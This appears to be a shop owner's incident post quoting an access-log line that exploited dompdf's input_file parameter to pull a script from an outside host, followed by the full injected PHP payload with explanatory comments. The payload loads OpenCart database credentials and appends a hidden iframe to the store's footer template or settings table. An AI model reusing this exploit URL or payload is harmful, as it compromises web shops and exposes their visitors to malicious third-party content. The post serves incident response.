Inspecting my access logs revealed that a remote site had accessed my shop using the following URL:
/artshop/upload/system/helper/dompdf/dompdf.php?input_file=http://musorka.cn.zp.ua/cfg/conf.txt
Here is the injected code:
<?php
/*********************************************/
// Payload string: a zero-size, hidden iframe pointing at a third-party URL.
// Everything below exists only to append this string to the shop's rendered
// pages. For incident response, this exact markup (width=0 height=0,
// display:none, the adsanalytics.net/in.cgi?2 source) is what to search theme
// files and the `setting` table for.
$INJ = '<iframe width=0 height=0 style=\'display:none\' src="http://adsanalytics.net/in.cgi?2"></iframe>';
/*********************************************/
// Silences all warnings/notices, so failed includes, queries and file writes
// below leave nothing in the PHP error log.
error_reporting(0);
// Searches $dir and then each parent directory in turn for a file named
// config.php that, once included, defines DB_HOSTNAME (the constant layout of
// the shop's own configuration — presumably OpenCart, given the DB_PREFIX and
// DIR_SYSTEM constants used further down). Returns the path of the first
// match; otherwise it recurses into "$dir../" with no depth limit (at the
// filesystem root "../" resolves to the root again, so the walk only ends
// on a match or when PHP exhausts its resources). Returns null when
// opendir() fails.
// The @include is what turns the victim's database credentials into
// constants visible to the rest of this script; error_reporting(0) above
// hides any include failure.
function findconfig($dir) {
    if ($dh = opendir($dir)) {
        while (($item = readdir($dh)) !== false) {
            if($item != "." && $item != "..") {
                // Only a file literally named config.php is considered; it is
                // executed, then tested for the expected DB constant.
                if(is_file($dir . $item) && $item == 'config.php') {
                    @include $dir . $item;
                    if(defined('DB_HOSTNAME')) {
                        return $dir . $item;
                    }
                }
            }
        }
        closedir($dh);
        // Nothing in this directory: try the parent.
        return findconfig($dir . "../");
    }
}
// Prints a status line and exits. The <resp> tags suggest the output is read
// by whatever automation requested this script (it was fetched remotely via
// dompdf's input_file parameter, per the access-log line above) — inferred,
// not visible here. Before exiting it deletes conf.php from the current
// working directory, presumably a locally dropped copy of this script;
// the listing does not show where that file comes from.
function halt($str) {
    echo $str;
    unlink('conf.php');
    die;
}
// 1. Locate the shop's config.php (walking up from the current directory) and
//    load its DB constants; abort if none is found.
if(!findconfig("./")) {
    halt("<resp>[-] Could not find config.php</resp>");
}
// 2. Connect with the credentials just loaded from config.php. Use of the
//    mysql_* extension dates this payload to PHP 5-era hosts.
if(!mysql_connect(DB_HOSTNAME, DB_USERNAME, DB_PASSWORD)) {
    halt("<resp>[-] Could not connect to DB</resp>");
}
if(!mysql_select_db(DB_DATABASE)) {
    halt("<resp>[-] Could not select DB</resp>");
}
// 3. Read the active theme name from the `setting` table, first with the
//    configured table prefix and then without one. PREFIX records which
//    variant worked so the later UPDATE targets the same table. With
//    error_reporting(0) a failed query simply yields a falsy $tpl.
$q = mysql_query("SELECT value FROM " . DB_PREFIX . "setting WHERE `key` = 'config_template' LIMIT 1");
$tpl = mysql_result($q, 0, "value");
if(!$tpl) {
    $q = mysql_query("SELECT value FROM setting WHERE `key` = 'config_template' LIMIT 1");
    $tpl = mysql_result($q, 0, "value");
    if($tpl) {
        define('PREFIX', '');
    } else {
        halt("<resp>[-] Could not retrieve theme</resp>");
    }
} else {
    define('PREFIX', DB_PREFIX);
}
// 4. Resolve the theme's footer template; two directory layouts are tried.
//    Both paths derive from DIR_SYSTEM, which also comes from config.php.
$footer1 = DIR_SYSTEM . "/../catalog/view/theme/" . $tpl . "/common/footer.tpl";
$footer2 = DIR_SYSTEM . "/../catalog/view/theme/" . $tpl . "/template/common/footer.tpl";
if(file_exists($footer1)) {
    $footer = $footer1;
} elseif(file_exists($footer2)) {
    $footer = $footer2;
} else {
    $footer = false;
}
// 5a. Footer missing or not writable by the web-server user: fall back to the
//     database. One of the store's welcome/description settings is selected
//     (the third OR term repeats config_description_1, apparently a typo for
//     another key) and the iframe is appended to its current value. The key
//     read back from the DB is interpolated into the next two queries as-is.
//     Cleanup check: the tail of the `setting` rows config_welcome_1 and
//     config_description_1 for the iframe markup.
if(!$footer || !is_writable($footer)) {
    $q = mysql_query("SELECT `key` FROM " . PREFIX . "setting WHERE `key` = 'config_welcome_1' OR `key` = 'config_description_1' OR `key` = 'config_description_1' LIMIT 1");
    $c = mysql_result($q, 0, "key");
    $q = mysql_query("SELECT value FROM " . PREFIX . "setting WHERE `key` = '$c' LIMIT 1");
    $v = mysql_result($q, 0, "value");
    $r = mysql_query("UPDATE " . PREFIX . "setting SET value = '".addslashes($v . $INJ)."' WHERE `key` = '$c' LIMIT 1");
    if($r) {
        halt("<resp>[+] Injected! (db)</resp>");
    } else {
        halt("<resp>[-] Could not update db</resp>");
    }
// 5b. Footer writable: append the iframe to footer.tpl so it renders on every
//     storefront page. Cleanup check: footer.tpl's modification time and its
//     trailing content.
} else {
    $fp = fopen($footer, 'a');
    if($fp) {
        fputs($fp, $INJ);
        fclose($fp);
        halt("<resp>[+] Injected! (file)</resp>");
    } else {
        halt("<resp>[-] Could not write to file</resp>");
    }
}
// Unreachable: every branch above ends in halt(), which already removes
// conf.php and exits.
unlink('conf.php');
die;
Bryn